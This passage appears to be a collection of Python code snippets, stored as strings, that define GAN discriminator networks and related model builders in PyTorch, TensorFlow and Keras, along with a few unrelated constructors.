nf_mult, kernel_size=kw, stride=2, padding=padw, bias=use_bias)),\n # norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n self.model = nn.Sequential(*sequence)", "def build_discriminator(self):\n with tf.variable_scope(\"discriminator\") as scope:\n\n # --- build the convolutional layers\n self.d_convlayers = list()\n mi = self.num_colors\n dim = self.img_dim\n count = 0\n for mo, filter_size, stride, apply_batch_norm in self.d_sizes['conv_layers']:\n name = f\"convlayer_{count}\" # name is used for get_variable later\n count += 1\n layer = ConvLayer(name, mi, mo, apply_batch_norm, filter_size, stride, lrelu)\n self.d_convlayers.append(layer)\n mi = mo\n print(f\"dim: 
{dim}\")\n # --- keep track of image dimensionality: need this for the first Dense layer\n dim = int(np.ceil(float(dim) / stride))\n\n # --- get the input dimensionalith for the first Dense layer\n mi = mi * dim * dim\n\n # --- build the dense layers\n self.d_denselayers = list()\n for mo, apply_batch_norm in self.d_sizes['dense_layers']:\n name = f\"denselayer_{count}\"\n count += 1\n layer = DenseLayer(name, mi, mo, apply_batch_norm, lrelu)\n mi = mo\n self.d_denselayers.append(layer)\n\n # --- final logistic regression layer (use it in the d_forward\n # function below to get the final logits)\n name = f\"denselayer_{count}\"\n self.d_finallayer = DenseLayer(name, mi, 1, False, lambda x: x)\n\n # --- get and return the logits\n logits = self.d_forward(self.X)\n return logits", "def init_net(self):\r\n # initialize the generator network\r\n g_net = Net(\r\n self.architecture['generator'], net_name='gen',\r\n data_format=FLAGS.IMAGE_FORMAT, num_class=self.num_class)\r\n # define layer connections in generator\r\n self.Gen = Routine(g_net)\r\n self.Gen.add_input_layers([64, self.code_size], [0])\r\n self.Gen.seq_links(list(range(g_net.num_layers)))\r\n self.Gen.add_output_layers([g_net.num_layers - 1])\r\n\r\n # initialize the generator network\r\n d_net = Net(\r\n self.architecture['discriminator'], net_name='dis',\r\n data_format=FLAGS.IMAGE_FORMAT, num_class=self.num_class)\r\n # define layer connections in generator\r\n self.Dis = Routine(d_net)\r\n self.Dis.add_input_layers([64] + list(self.architecture['input'][0]), [0])\r\n self.Dis.seq_links(list(range(d_net.num_layers)))\r\n self.Dis.add_output_layers([d_net.num_layers - 1])", "def __init__(self):\n\n super(GlobalDiscriminator, self).__init__()\n\n # input image will have the size of 64x64x3\n self.first_conv_layer = TransitionDown(in_channels=3, out_channels=32, kernel_size=5)\n self.second_conv_layer = TransitionDown(in_channels=32, out_channels=32, kernel_size=5)\n self.third_conv_layer = TransitionDown(in_channels=32, out_channels=64, kernel_size=5)\n self.fourth_conv_layer = TransitionDown(in_channels=64, out_channels=64, kernel_size=5)\n\n self.fc1 = nn.Linear(5 * 5 * 64, 1)\n\n torch.nn.init.xavier_uniform(self.fc1.weight)", "def __init__(self, image_size):\n super(SiameseDiscriminator, self).__init__()\n self.cnn1 = nn.Sequential(\n nn.ReflectionPad2d(1),\n nn.Conv2d(3, 4, kernel_size=3),\n nn.LeakyReLU(0.1, inplace=True),\n nn.BatchNorm2d(4),\n nn.Dropout2d(p=.2),\n\n nn.ReflectionPad2d(1),\n nn.Conv2d(4, 8, kernel_size=3),\n nn.LeakyReLU(0.1, inplace=True),\n nn.BatchNorm2d(8),\n nn.Dropout2d(p=.2),\n\n nn.ReflectionPad2d(1),\n nn.Conv2d(8, 8, kernel_size=3),\n nn.LeakyReLU(0.1, inplace=True),\n nn.BatchNorm2d(8),\n nn.Dropout2d(p=.2))\n\n self.fc1 = nn.Sequential(\n nn.Linear(8 * image_size * image_size, 500),\n nn.LeakyReLU(0.1, inplace=True),\n\n nn.Linear(500, 500),\n nn.LeakyReLU(0.1, inplace=True),\n\n nn.Linear(500, 15))", "def model_setup(self):\n self.DNN = DgganMLP(self.settings.hidden_size)\n self.D = DgganMLP(self.settings.hidden_size)\n self.G = Generator(self.settings.hidden_size)", "def discriminator(self):\n\n # Initializate the neural network\n discriminator = Sequential()\n\n # Convolution, bias, activate\n discriminator.add(Conv2D(filters=self.first_layer_filter,\n kernel_size=self.kernel_size,\n strides=self.stride_size,\n padding='same',\n data_format='channels_last',\n kernel_initializer='glorot_uniform',\n input_shape=self.image_shape))\n # Activate\n discriminator.add(LeakyReLU(0.2))\n # 
Convolution\n discriminator.add(Conv2D(filters=self.second_layer_filter,\n kernel_size=self.kernel_size,\n strides=self.stride_size,\n padding='same',\n data_format='channels_last',\n kernel_initializer='glorot_uniform'))\n\n # Normalize\n discriminator.add(BatchNormalization(momentum=0.5, epsilon=1e-5))\n # Activate\n discriminator.add(LeakyReLU(0.2))\n\n # Convolution\n discriminator.add(Conv2D(filters=self.third_layer_filter,\n kernel_size=self.kernel_size,\n strides=self.stride_size,\n padding='same',\n data_format='channels_last',\n kernel_initializer='glorot_uniform'))\n\n # Normalize\n discriminator.add(BatchNormalization(momentum=0.5, epsilon=1e-5))\n # Activate\n discriminator.add(LeakyReLU(0.2))\n # Convolution\n discriminator.add(Conv2D(filters=self.last_layer_size,\n kernel_size=self.kernel_size,\n strides=self.stride_size,\n padding='same',\n data_format='channels_last',\n kernel_initializer='glorot_uniform'))\n # Normalize\n discriminator.add(BatchNormalization(momentum=0.5, epsilon=1e-5))\n # Activate\n discriminator.add(LeakyReLU(0.2))\n\n discriminator.add(Flatten())\n discriminator.add(Dense(1))\n discriminator.add(Activation('sigmoid'))\n\n optimizer = Adam(lr=self.lr, beta_1=self.beta)\n discriminator.compile(loss=self.loss,\n optimizer=optimizer,\n metrics=None)\n\n return discriminator", "def __init__(\n self, config: SimpleGCNConfig = SimpleGCNConfig(name=\"simplegcn\")\n ):\n super().__init__()\n self.edge_lengthscale = config.edge_lengthscale\n self.weight_edges = config.weight_edges\n\n self.atom_embedding = nn.Linear(\n config.atom_input_features, config.width\n )\n\n self.layer1 = GraphConv(config.width, config.width)\n self.layer2 = GraphConv(config.width, config.output_features)\n self.readout = AvgPooling()", "def __init__(self, num_gpus):\n\n super(Discriminator, self).__init__()\n n_in = IMG_CHANNELS\n n_out = 1\n\n feature_map = IMG_SIZE\n kernel_size = 4\n stride = 2\n padding = 1\n bias = False\n\n self.num_gpus = num_gpus\n\n self.network = nn.Sequential(\n # input is image\n nn.Conv2d(n_in, feature_map, kernel_size, stride, padding, bias=bias),\n nn.LeakyReLU(0.2, inplace=True),\n\n # nodes = feature_map * 2\n nn.Conv2d(feature_map, feature_map * 2, kernel_size, stride, padding, bias=bias),\n nn.BatchNorm2d(feature_map * 2),\n nn.LeakyReLU(0.2, inplace=True),\n\n # nodes = feature_map * 4\n nn.Conv2d(feature_map * 2, feature_map * 4, kernel_size, stride, padding, bias=bias),\n nn.BatchNorm2d(feature_map * 4),\n nn.LeakyReLU(0.2, inplace=True),\n\n # nodes = feature_map * 8\n nn.Conv2d(feature_map * 4, feature_map * 8, kernel_size, stride, padding, bias=bias),\n nn.BatchNorm2d(feature_map * 8),\n nn.LeakyReLU(0.2, inplace=True),\n\n # nodes = 1\n nn.Conv2d(feature_map * 8, n_out, kernel_size, 1, 0, bias=bias),\n nn.Sigmoid()\n )", "def discriminator(self, discriminator: str):\n pass # setter is ignored for discriminator property", "def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d):\n super(GLConvDiscriminator, self).__init__()\n\n kw = 4\n padw = 1\n sequence = [\n DiscriminatorBlock(input_nc, ndf, downsample=True)\n ]\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers): # gradually increase the number of filters\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8)\n sequence += [\n DiscriminatorBlock(ndf * nf_mult_prev, ndf * nf_mult)\n ]\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 8)\n # sequence += [DiscriminatorBlock(ndf * nf_mult_prev, ndf * nf_mult, downsample=False)]\n sequence += [\n nn.Conv2d(ndf 
* nf_mult_prev, ndf * nf_mult, kernel_size=3, stride=1, padding=1),\n nn.InstanceNorm2d(ndf*nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n self.model = nn.Sequential(*sequence)\n self.patchgan_conv = nn.Conv2d(ndf * nf_mult, 1, kernel_size=3, stride=1, padding=1)\n # self.global_conv = nn.Conv2d(ndf * nf_mult, ndf * nf_mult, kernel_size=3, stride=1, padding=1)", "def setup_net(self):\n\t\tself.src_net = get_model(self.base_model, num_cls=self.num_cls, \\\n\t\t\t\t\t\t\t\t l2_normalize=self.l2_normalize, temperature=self.temperature)\n\t\tself.tgt_net = self.custom_copy(self.src_net, self.weight_sharing)\n\n\t\tinput_dim = self.num_cls\n\t\tself.discriminator = nn.Sequential(\n\t\t\t\tnn.Linear(input_dim, 500),\n\t\t\t\tnn.ReLU(),\n\t\t\t\tnn.Linear(500, 500),\n\t\t\t\tnn.ReLU(),\n\t\t\t\tnn.Linear(500, 2),\n\t\t\t\t)\n\n\t\tself.image_size = self.src_net.image_size\n\t\tself.num_channels = self.src_net.num_channels", "def __init__(self, **config):\n super(Classifier, self).__init__()\n self.input_dim_drug = config['hidden_dim_drug']\n self.input_dim_protein = config['hidden_dim_protein']\n self.hidden_dims = config['cls_hidden_dims']\n self.visual_attention=config['visual_attention']\n dims = [self.input_dim_drug + self.input_dim_protein] + self.hidden_dims + [2]\n if config['attention']:\n if config['concatenation']:\n dims[0]+=config['cnn_target_filters'][-1]\n else:\n dims[0]=self.input_dim_drug+config['cnn_target_filters'][-1]\n self.predictor = nn.ModuleList([nn.Linear(dims[i], dims[i + 1]) for i in range(len(self.hidden_dims)+1)])\n self.dropout = nn.Dropout(0.25)\n self._initialize()", "def build_discriminator():\n leakyrelu_alpha = 0.2\n momentum = 0.8\n input_shape = (256, 256, 3)\n\n input_layer = Input(shape=input_shape)\n\n # Add the first convolution block\n dis1 = Conv2D(filters=64, kernel_size=3, strides=1, padding='same')(input_layer)\n dis1 = LeakyReLU(alpha=leakyrelu_alpha)(dis1)\n\n # Add the 2nd convolution block\n dis2 = Conv2D(filters=64, kernel_size=3, strides=2, padding='same')(dis1)\n dis2 = LeakyReLU(alpha=leakyrelu_alpha)(dis2)\n dis2 = BatchNormalization(momentum=momentum)(dis2)\n\n # Add the third convolution block\n dis3 = Conv2D(filters=128, kernel_size=3, strides=1, padding='same')(dis2)\n dis3 = LeakyReLU(alpha=leakyrelu_alpha)(dis3)\n dis3 = BatchNormalization(momentum=momentum)(dis3)\n\n # Add the fourth convolution block\n dis4 = Conv2D(filters=128, kernel_size=3, strides=2, padding='same')(dis3)\n dis4 = LeakyReLU(alpha=leakyrelu_alpha)(dis4)\n dis4 = BatchNormalization(momentum=0.8)(dis4)\n\n # Add the fifth convolution block\n dis5 = Conv2D(256, kernel_size=3, strides=1, padding='same')(dis4)\n dis5 = LeakyReLU(alpha=leakyrelu_alpha)(dis5)\n dis5 = BatchNormalization(momentum=momentum)(dis5)\n\n # Add the sixth convolution block\n dis6 = Conv2D(filters=256, kernel_size=3, strides=2, padding='same')(dis5)\n dis6 = LeakyReLU(alpha=leakyrelu_alpha)(dis6)\n dis6 = BatchNormalization(momentum=momentum)(dis6)\n\n # Add the seventh convolution block\n dis7 = Conv2D(filters=512, kernel_size=3, strides=1, padding='same')(dis6)\n dis7 = LeakyReLU(alpha=leakyrelu_alpha)(dis7)\n dis7 = BatchNormalization(momentum=momentum)(dis7)\n\n # Add the eight convolution block\n dis8 = Conv2D(filters=512, kernel_size=3, strides=2, padding='same')(dis7)\n dis8 = LeakyReLU(alpha=leakyrelu_alpha)(dis8)\n dis8 = BatchNormalization(momentum=momentum)(dis8)\n\n # Add a dense layer\n #avgd = keras.layers.AveragePooling2D(pool_size=(4,4) , strides = (4,4))(dis8)\n\n #flat = 
keras.layers.Flatten()(dis8)\n dis9 = Dense(units=1024)(dis8)\n dis9 = LeakyReLU(alpha=0.2)(dis9)\n\n # Last dense layer - for classification\n output = Dense(units=1, activation='sigmoid')(dis9)\n\n model = Model(inputs=[input_layer], outputs=[output], name='discriminator')\n return model", "def __init__(self, config, set_name, preprocess_image):\n\t\t\tself.data_dir = config['data_dir']\n\t\t\tself.set_name = set_name\n\t\t\tself.coco = COCO(os.path.join(self.data_dir, 'annotations', 'instances_' + set_name + '.json'))\n\t\t\tself.image_ids = self.coco.getImgIds()\n\t\t\tself.mask = config['mask']\n\n\t\t\tself.load_classes()\n\n\t\t\tsuper(CocoGenerator, self).__from_config__(config, preprocess_image=preprocess_image)", "def __init__(self, n, sick_init, social_dist, radius=0.01, styles=None, total_beds=10, box_length=1, recovery_time=1000):\n\n self.init_persons(n, sick_init, social_dist, radius, box_length, recovery_time, total_beds, styles)\n self.init_hospital(total_beds)", "def __init__(self, input_nc, opt_net,ndf=64, n_layers=DEFAULT_N_LAYERS, norm_layer=nn.BatchNorm2d):\n super(PatchGAN_Discriminator, self).__init__()\n if type(norm_layer) == functools.partial: # no need to use bias as BatchNorm2d has affine parameters\n use_bias = norm_layer.func != nn.BatchNorm2d\n else:\n use_bias = norm_layer != nn.BatchNorm2d\n\n self.decomposed_input = bool(opt_net['decomposed_input'])\n self.pre_clipping = bool(opt_net['pre_clipping'])\n projected_component_sequences = []\n in_ch_addition = input_nc if self.decomposed_input else 0\n kw = 4\n padw = 1\n max_out_channels = 512\n sequences = [nn.Sequential(*[nn.Conv2d(input_nc+in_ch_addition, ndf, kernel_size=kw, stride=2, padding=padw), nn.LeakyReLU(0.2, True)])]\n # if self.decomposed_input:\n # projected_component_sequences = [nn.Conv2d(input_nc, input_nc, kernel_size=kw, stride=2, padding=padw)]\n\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers): # gradually increase the number of filters\n # nf_mult_prev = nf_mult\n # nf_mult = min(2 ** max(0,n-n_layers+self.DEFAULT_N_LAYERS), 8)\n nf_mult_prev = min(max_out_channels, ndf * nf_mult) // ndf\n nf_mult = min(2 ** n, 8)\n sequences.append(nn.Sequential(*[\n nn.Conv2d(ndf * nf_mult_prev+in_ch_addition, min(max_out_channels, ndf * nf_mult), kernel_size=kw,\n stride=2 if n > n_layers - self.DEFAULT_N_LAYERS else 1,\n padding=padw, bias=use_bias), norm_layer(ndf * nf_mult), nn.LeakyReLU(0.2, True)]))\n # if self.decomposed_input:\n # projected_component_sequences.append(\n # nn.Conv2d(input_nc,input_nc, kernel_size=kw,\n # stride=2 if n > n_layers - self.DEFAULT_N_LAYERS else 1,\n # padding=padw, bias=use_bias))\n\n # nf_mult_prev = nf_mult\n nf_mult_prev = min(max_out_channels, ndf * nf_mult) // ndf\n nf_mult = min(2 ** n_layers, 8)\n sequences.append(nn.Sequential(*[\n nn.Conv2d(ndf * nf_mult_prev+in_ch_addition, min(max_out_channels, ndf * nf_mult), kernel_size=kw, stride=1,\n padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)]))\n # if self.decomposed_input:\n # projected_component_sequences.append(\n # nn.Conv2d(input_nc,input_nc, kernel_size=kw, stride=1,\n # padding=padw, bias=use_bias))\n sequences.append(nn.Sequential(*[\n nn.Conv2d(min(max_out_channels, ndf * nf_mult)+in_ch_addition, 1, kernel_size=kw, stride=1,\n padding=padw)])) # output 1 channel prediction map\n self.num_modules = len(sequences)\n if self.decomposed_input:\n for seq in sequences:\n conv_stride = [child.stride[0] for child in seq.children() if 'Conv2d' in 
str(child.__class__)]\n assert len(conv_stride)<=1,'More than one conv layer in seq?'\n if len(conv_stride)>0:\n projected_component_sequences.append(nn.Conv2d(input_nc,input_nc, kernel_size=kw, stride=conv_stride[0],\n padding=padw, bias=use_bias))\n self.model = nn.ModuleList(sequences+projected_component_sequences)", "def __init__(self, generator:Model,\n discriminator:Model,\n latent_dim:Optional[Union[int, Tuple]]=None,\n n_disc:int=3,\n epochs:int=100, \n batch_size:int=32,\n optimizer:Optional[Union[str, Dict]]=None,\n optimizer_kwargs:Optional[Dict]=None,\n name:str='QGAN',\n random_state:Optional[int]=None,\n checkpoint_dir:Optional[str]=None,\n checkpoint_interval:int=10,\n checkpoint_max_to_keep:Optional[int]=None):\n super().__init__(generator=generator,\n discriminator=discriminator,\n latent_dim=latent_dim,\n n_disc=n_disc,\n epochs=epochs,\n batch_size=batch_size,\n optimizer=optimizer,\n optimizer_kwargs=optimizer_kwargs,\n name=name,\n random_state=random_state,\n checkpoint_dir=checkpoint_dir,\n checkpoint_interval=checkpoint_interval,\n checkpoint_max_to_keep=checkpoint_max_to_keep)", "def build_discriminator():\n\n #Slope and weight initializer are chosen to match parmeters in the paper\n weight_initializer = tf.keras.initializers.RandomNormal(stddev=0.02)\n slope = 0.2\n inputs = keras.Input(shape=(64,64,3))\n x = preprocessing.Rescaling(scale=1./127.5, offset=-1.)(inputs)\n\n # First conv layer\n x = Conv2D(\n 64,\n 4,\n 2,\n padding='same',\n use_bias=False,\n kernel_initializer=weight_initializer\n )(x)\n x = LeakyReLU(alpha=slope)(x)\n\n # Second conv layer\n x = Conv2D(\n 128,\n 4,\n 2,\n padding='same',\n use_bias=False,\n kernel_initializer=weight_initializer\n )(x)\n x = BatchNormalization()(x)\n x = LeakyReLU(alpha=slope)(x)\n \n # Third conv layer\n x = Conv2D(\n 256,\n 4,\n 2,\n padding='same',\n use_bias=False,\n kernel_initializer=weight_initializer\n )(x)\n x = BatchNormalization()(x)\n x = LeakyReLU(alpha=slope)(x)\n\n # Fourth conv layer\n x = Conv2D(\n 512,\n 4,\n 2,\n padding='same',\n use_bias=False,\n kernel_initializer=weight_initializer\n )(x)\n x = BatchNormalization()(x)\n x = LeakyReLU(alpha=slope)(x)\n\n # Predictions. Note that we use logits so thhere is no activation at the end. 
\n x = layers.Flatten()(x)\n x = layers.Dense(1,kernel_initializer=weight_initializer)(x)\n \n model = keras.Model(inputs=inputs, outputs=x)\n return model", "def build_gan(self):\n # make weights in the discriminator not trainable\n self.d_model.trainable = False\n # get noise and label inputs from generator model\n gen_noise, gen_label = self.g_model.input\n # get image output from the generator model\n gen_output = self.g_model.output\n # connect image output and label input from generator as inputs to discriminator\n gan_output = self.d_model([gen_output, gen_label])\n # define gan model as taking noise and label and outputting a classification\n self.gan_model = Model([gen_noise, gen_label], gan_output)\n # compile model\n opt = Adam(lr=0.0002, beta_1=0.5)\n self.gan_model.compile(loss='binary_crossentropy', optimizer=opt)", "def __init__(self, sigma=0.4, alpha=1.0, reset_always=True):\n super().__init__()\n self.sigma = sigma\n self.alpha = alpha\n self.reset_always = reset_always\n self.guided_attn_masks = None\n self.masks = None", "def __init__(self, img_size=helpers.IMG_SIZE, channels=helpers.CHANNELS):\n super(Discriminator, self).__init__()\n self.model = nn.Sequential(\n nn.Linear(channels*img_size*img_size, 512),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(512, 256),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(256, 1),\n nn.Sigmoid(),\n )", "def define_discriminator(image_shape=(256, 256, 1)):\n\n # weight initialization\n init = RandomNormal(stddev=0.02)\n # source image input\n in_src_image = Input(shape=image_shape)\n # target image input\n in_target_image = Input(shape=image_shape)\n # concatenate images channel-wise\n merged = Concatenate()([in_src_image, in_target_image])\n # C64\n d = Conv2D(64, (4, 4), strides=(2, 2), padding='same',\n kernel_initializer=init)(merged)\n d = LeakyReLU(alpha=0.2)(d)\n # C128\n d = Conv2D(128, (4, 4), strides=(2, 2), padding='same',\n kernel_initializer=init)(d)\n d = BatchNormalization()(d)\n d = LeakyReLU(alpha=0.2)(d)\n # C256\n d = Conv2D(256, (4, 4), strides=(2, 2), padding='same',\n kernel_initializer=init)(d)\n d = BatchNormalization()(d)\n d = LeakyReLU(alpha=0.2)(d)\n # C512\n d = Conv2D(512, (4, 4), strides=(2, 2), padding='same',\n kernel_initializer=init)(d)\n d = BatchNormalization()(d)\n d = LeakyReLU(alpha=0.2)(d)\n # second last output layer\n d = Conv2D(512, (4, 4), padding='same', kernel_initializer=init)(d)\n d = BatchNormalization()(d)\n d = LeakyReLU(alpha=0.2)(d)\n # patch output\n d = Conv2D(1, (4, 4), padding='same', kernel_initializer=init)(d)\n patch_out = Activation('sigmoid')(d)\n # define model\n model = Model([in_src_image, in_target_image], patch_out)\n # compile model\n opt = Adam(lr=0.0002, beta_1=0.5)\n model.compile(loss='binary_crossentropy', optimizer=opt,\n loss_weights=[0.5])\n\n return model", "def build_discriminator(self):\n img_shape = (self.img_size[0], self.img_size[1], self.channels)\n\n model = Sequential()\n ###############\n # Conv Stack 1:\n ###############\n model.add(\n Conv2D(128, kernel_size=5, strides=2, input_shape=img_shape, padding=\"same\")\n ) # 128x128 -> 64x64\n\n model.add(LeakyReLU(alpha=0.2))\n model.add(BatchNormalization(momentum=0.8))\n # model.add(Dropout(0.2))\n\n ###############\n # Conv Stack 2:\n ###############\n model.add(\n Conv2D(128, kernel_size=5, strides=2, padding=\"same\")\n ) # 64x64 -> 32x32\n # model.add(ZeroPadding2D(padding=((0, 1), (0, 1))))\n\n model.add(LeakyReLU(alpha=0.2))\n model.add(BatchNormalization(momentum=0.8))\n # 
model.add(Dropout(0.25))\n\n ###############\n # Conv Stack 3:\n ###############\n model.add(\n Conv2D(128, kernel_size=4, strides=2, padding=\"same\")\n ) # 32x32 -> 16x16\n\n model.add(LeakyReLU(alpha=0.2))\n model.add(BatchNormalization(momentum=0.8))\n # model.add(Dropout(0.25))\n\n ###############\n # Conv Stack 4:\n ###############\n model.add(Conv2D(128, kernel_size=4, strides=1, padding=\"same\")) # 16x16 -> 8x8\n model.add(LeakyReLU(alpha=0.2))\n model.add(BatchNormalization(momentum=0.8))\n # model.add(Dropout(0.25))\n\n ###############\n # Conv Stack 5:\n ###############\n model.add(Conv2D(128, kernel_size=3, strides=1, padding=\"same\")) # 8x8 -> 4x4\n model.add(LeakyReLU(alpha=0.2))\n model.add(BatchNormalization(momentum=0.8))\n model.add(Dropout(0.4))\n\n model.add(Flatten())\n model.add(Dense(1, activation=\"sigmoid\")) # important binary classification.\n\n model.summary()\n\n # Model require Pair.\n img = Input(shape=img_shape)\n validity = model(img)\n\n return Model(img, validity)", "def __init__(self, config):\n super(NLayerDiscriminator, self).__init__()\n input_nc = config[\"in_channels\"]\n ndf = config[\"ndf\"]\n n_layers = config[\"n_layers\"]\n use_actnorm = config[\"use_actnorm\"]\n use_spectral = config[\"spectral_norm\"]\n if not use_actnorm:\n norm_layer = nn.BatchNorm2d\n else:\n norm_layer = ActNorm\n if type(norm_layer) == functools.partial: # no need to use bias as BatchNorm2d has affine parameters\n use_bias = norm_layer.func != nn.BatchNorm2d\n else:\n use_bias = norm_layer != nn.BatchNorm2d\n\n kw = 4\n padw = 1\n sequence = [nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw), nn.LeakyReLU(0.2, True)]\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers): # gradually increase the number of filters\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=2, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=1, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n sequence += [\n nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)] # output 1 channel prediction map\n\n if use_spectral:\n for i, lay in enumerate(sequence):\n if isinstance(lay, nn.Conv2d):\n sequence[i] = spectral_norm(lay)\n\n self.main = nn.Sequential(*sequence)\n\n weights_init(self.main)", "def discriminator_model_lungs():\n # Initialize the weights\n init = tf.random_normal_initializer(0.0, 0.02)\n\n img_shape = (400, 400, 1)\n\n # Source and target image input\n source_img = tf.keras.Input(shape=img_shape)\n target_img = tf.keras.Input(shape=img_shape)\n\n # Concatenate images channel-wise\n src_tgt_img = Concatenate()([source_img, target_img]) # L : 400 x 400 x 1 # G: 200 x 200 x 1\n\n # C128\n d1 = Conv2D(filters=128, kernel_size=(4, 4), strides=(2, 2), padding='same', kernel_initializer=init)(\n src_tgt_img) # L: 200 x 200 x 128 # G: 100 x 100 x 128 # RF: 4\n d1 = LeakyReLU(alpha=0.2)(d1)\n\n # C256\n d2 = Conv2D(filters=256, kernel_size=(4, 4), strides=(2, 2), padding='same', kernel_initializer=init)(\n d1) # G: 100 x 100 x 256 # L: 50 x 50 x 256 # RF: 10\n d2 = BatchNormalization()(d2)\n d2 = LeakyReLU(alpha=0.2)(d2)\n\n # C512\n d3 = Conv2D(filters=512, kernel_size=(4, 4), strides=(2, 2), padding='same', kernel_initializer=init)(\n d2) # G: 
50 x 50 x 512 # L: 25 x 25 x 512 # RF: 22\n d3 = BatchNormalization()(d3)\n d3 = LeakyReLU(alpha=0.2)(d3)\n d3 = ZeroPadding2D()(d3) # G: 52 x 52 x 512 # L: 27 x 27 x 512\n\n # Patch output\n d4 = Conv2D(filters=1, kernel_size=(3, 3), strides=(1, 1), padding='valid', kernel_initializer=init)(\n d3) # G: 50 x 50 x 1 # L: 25 x 25 x 1 # RF: 38\n output_patch = Activation('sigmoid')(d4)\n\n # Define model\n discriminator_model = tf.keras.Model([source_img, target_img], output_patch)\n return discriminator_model", "def build_discriminator(shape):\n input_img = Input(shape=(shape)) \n x = Conv2D(64, (3, 3), padding='same')(input_img)\n x = LeakyReLU()(x)\n x = Dropout(0.25)(x)\n x = BatchNormalization(momentum=0.8)(x)\n x = AveragePooling2D((2, 2), padding='same')(x)\n x = Conv2D(8, (3, 3), padding='same')(x)\n x = LeakyReLU()(x)\n x = Dropout(0.25)(x)\n x = BatchNormalization(momentum=0.8)(x)\n x = AveragePooling2D((2, 2), padding='same')(x)\n x = Conv2D(8, (3, 3), padding='same')(x)\n x = LeakyReLU()(x)\n x = Dropout(0.25)(x)\n x = BatchNormalization(momentum=0.8)(x)\n x = AveragePooling2D((2, 2), padding='same')(x)\n x = Conv2D(1, (3, 3), padding='same')(x)\n x = LeakyReLU()(x)\n x = Flatten()(x)\n o = Dense(1,activation='sigmoid')(x)\n Discriminator=Model(input_img,o,name='discriminator')\n return input_img,o,Discriminator", "def load_discriminator(dcgan_net):\n netD_trained = dcgan_net.myTrainOneStepCellForD.network.netD\n for m in netD_trained.discriminator.cells_and_names():\n if m[0] == '0':\n print(m[0], m[1])\n conv_1 = m[1]\n elif m[0] == '1':\n print(m[0], m[1])\n leakyReLU_1 = m[1]\n elif m[0] == '2':\n print(m[0], m[1])\n conv_2 = m[1]\n elif m[0] == '3':\n print(m[0], m[1])\n bm_1 = m[1]\n elif m[0] == '4':\n print(m[0], m[1])\n leakyReLU_2 = m[1]\n elif m[0] == '5':\n print(m[0], m[1])\n conv_3 = m[1]\n return conv_1, leakyReLU_1, conv_2, bm_1, leakyReLU_2, conv_3", "def build_gan(self):\n\n # Specify te generators used to build various components.\n optimizer_generator = Adam(0.0002, 0.5)\n optimizer_discriminator = Adam(0.0002, 0.5)\n optimizer_GAN = Adam(0.0002, 0.5)\n\n loss_measure_generator = \"binary_crossentropy\"\n loss_measure_discriminator = \"binary_crossentropy\"\n loss_measure_GAN = \"binary_crossentropy\"\n\n metrics = [\"accuracy\", \"mae\", \"mse\", \"mape\", \"cosine\"]\n\n # See if the specified model paths exist, if they don't then we start training new models\n if (\n hasattr(self, \"discriminator_path\")\n and hasattr(self, \"generator_path\")\n and self.discriminator_path.is_file()\n and self.generator_path.is_file()\n ):\n self.discriminator = load_model(self.discriminator_path)\n self.generator = load_model(self.generator_path)\n print(\"Loaded models...\")\n else: # training new model.\n print(\"Training models...\")\n\n # Generate the tensorboard and its call back\n callback_tensorboard = TensorBoard(\n log_dir=path_log_run, histogram_freq=0, write_images=True\n )\n\n # self.callbacks_list = [callback_tensorboard]\n\n # Build discriminator and compile it.\n self.discriminator = self.build_discriminator()\n\n # Training discriminator!\n self.discriminator.compile(\n loss=loss_measure_discriminator,\n optimizer=optimizer_discriminator,\n # metrics=metrics,\n # callbacks=self.callbacks_list,\n )\n\n # Build generator and compile it.\n self.generator = self.build_generator()\n\n # Training generator!\n self.generator.compile(\n loss=loss_measure_generator,\n optimizer=optimizer_generator,\n # callbacks=self.callbacks_list,\n )\n\n # These next few lines 
setup the training for the GAN, which the input Vector has a shape of noise_parameters\n z = Input(shape=(self.dimensions_noise,))\n img = self.generator(z)\n\n self.discriminator.trainable = False\n\n # Call the discriminator on the image generated by the generator.\n # Store the output\n valid = self.discriminator(img)\n\n # Form a model that combine both the input and the output pair.\n self.combined = Model(z, valid)\n\n # Compile the model using binary_crossentropy with the\n self.combined.compile(loss=loss_measure_GAN, optimizer=optimizer_GAN)", "def __init__(self, input_nc, ndf=64, n_layers=6, norm_layer=nn.BatchNorm2d):\n super(DovenetNLayerDiscriminator, self).__init__()\n num_outputs = ndf * min(2 ** n_layers, 8)\n self.D = OrgDiscriminator(input_nc, ndf, n_layers, norm_layer)\n self.convl1 = spectral_norm(nn.Conv2d(num_outputs, num_outputs, kernel_size=1, stride=1))\n self.relul1 = nn.LeakyReLU(0.2)\n self.convl2 = spectral_norm(nn.Conv2d(num_outputs, num_outputs, kernel_size=1, stride=1))\n self.relul2 = nn.LeakyReLU(0.2)\n self.convl3 = nn.Conv2d(num_outputs, 1, kernel_size=1, stride=1)\n self.convg3 = nn.Conv2d(num_outputs, 1, kernel_size=1, stride=1)", "def init_weights(self, pretrained=None):\n\n super(EncoderDecoder_gan, self).init_weights(pretrained)\n self.backbone.init_weights(pretrained=pretrained)\n self.backbone_gan.init_weights(pretrained=pretrained)\n self.decode_head.init_weights()\n # init GAN\n # self.discriminator.init_weight()\n # self.G_head.init_weights()\n if 